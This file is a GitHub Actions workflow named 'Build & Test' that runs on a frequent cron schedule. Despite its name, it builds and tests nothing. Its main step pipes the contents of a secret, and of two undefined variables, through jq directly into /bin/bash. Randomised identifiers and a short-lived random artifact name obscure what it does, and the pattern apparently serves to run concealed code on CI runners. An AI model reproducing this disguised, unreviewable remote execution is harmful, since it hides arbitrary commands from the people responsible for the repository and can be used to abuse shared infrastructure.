name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '42 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          rww4: ${{ secrets.rww4 }}
        run: |
          printf '%s' "$rww4" | jq -r .cl7 | /bin/bash
          printf '%s' "$fxkht72" | jq -r .x8599 | /bin/bash
          printf '%s' "$bwkqh66958" | jq -r .etgg4 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 6W6dCyas
          path: "*.zip"
          retention-days: 1
